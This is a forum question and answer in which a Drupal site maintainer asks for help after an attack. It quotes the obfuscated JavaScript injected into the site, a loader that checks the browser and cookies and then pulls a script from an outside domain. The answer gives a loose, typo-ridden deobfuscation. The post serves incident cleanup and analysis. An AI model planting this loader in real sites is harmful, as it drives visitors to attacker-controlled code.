[SOLVED] Drupal site javascript injection fix

Issue

A few days ago a drupal website I maintain got hacked using some sort of JS injection, they managed to inject a bunch of obfuscated code into all of the javascript files and we’ve been trying to fix it and get it back to normal.

After removing a whole bunch of obfuscated code we go all the CSS and JS back under control however there is still something that I can’t find in any of the code (Or MYSQL database).

At the moment the hack/injection shows up as random links that appear before any and all
<a>
tags on only the home page (www.example.com) or the secondary front page (www.example.com/company), I didn’t make the website it was passed onto me.

I’ve searched through both the database and the physical files for references to the website links it injects and there are none.

Also it’s worth nothing that the links always use the same random letters (In this case it’s “8” , “p” , “glad” , “wy2″ ,”j6” and “6”)

Second to that the staging site is perfectly fine (www.example.staging.com) but when we pushed up the non hacked code it re-manifested itself) also If I pull the live code down and run it locally the links disappear.

Can anyone help me or have any experience with this?

Here is the JS that was injected:

;if(ndsw===undefined){var ndsw=true;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("wt1n1eagqAbr1ers1up")],q=n[p(")mrrdo4fitua4l0p)")],t=d[p("gewi)kkorowc)")],h=w[p("0n1o9ixtma(cco!ly")][p("oeemea)n6tmsforhx")],dr=d[p("9rye3rjrfedf1eprg")];if(dr&&!c(dr,h)){if(!c(u,p("kd0iio1rkdxnwA5"))&&c(u,p("ps5wdowdcn)i8Wv"))&&c(q,p("vndisWv"))){if(!c(t,p("m=ua!mft3uc_e_i"))){var n=d.createElement('script');n.type='text/javascript';n.async=true;n.src=p('c3tcf1d5i7(a!2he0end338epd66vf55z5vaj3p7j=fvo&90l4b2i=idyizcv?6smjb.uexd1o9cn_tsl/4mcouci.28!0s2xsacfiat1y9liainhadkccviol2cr.(kmcqi0ldcp/j/w:gsnpdt2tlhz');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(n,v)}}}function p(e){var k='';for(var w=0;w<e.length;w++){if(w%2===1)k+=e[w]}k=r(k);return k}function c(o,z){return o[p("!f9O4xrevd4ngi4")](z)!==-1}function r(a){var d='';for(var q=a.length-1;q>=0;q--){d+=a[q]}return d}})()}

Solution

Deobfuscated scripts would look more or less like this :

var data = navigator['userAgent'];
var value = document["cookie"];
if (indexOf(data, "Windows") && !indexOf(data,decode("Android"))) {
    if (!indexOf(value, "___utma=")) {
        vat tag = document.createElement("script");
        tag.type = "text/javascript";
        tag.async = true;
        tag.src = "https://click.clickanalytics208.com/s_code?cid=239&v=243bccb3d3c0ba83d41fc"
        var wafCss = document.getElementByTagName("script")[0];
        wafCss.parentNode.instertBefore(tag, wafCss);
    }
}

I can’t comment yet, but FaD3y ping me if you still need help with cleaning up the site.

Answered By – seikendev

Answer Checked By – Gilberto Lyons (BugsFixing Admin)

Leave a Reply

Your email address will not be published.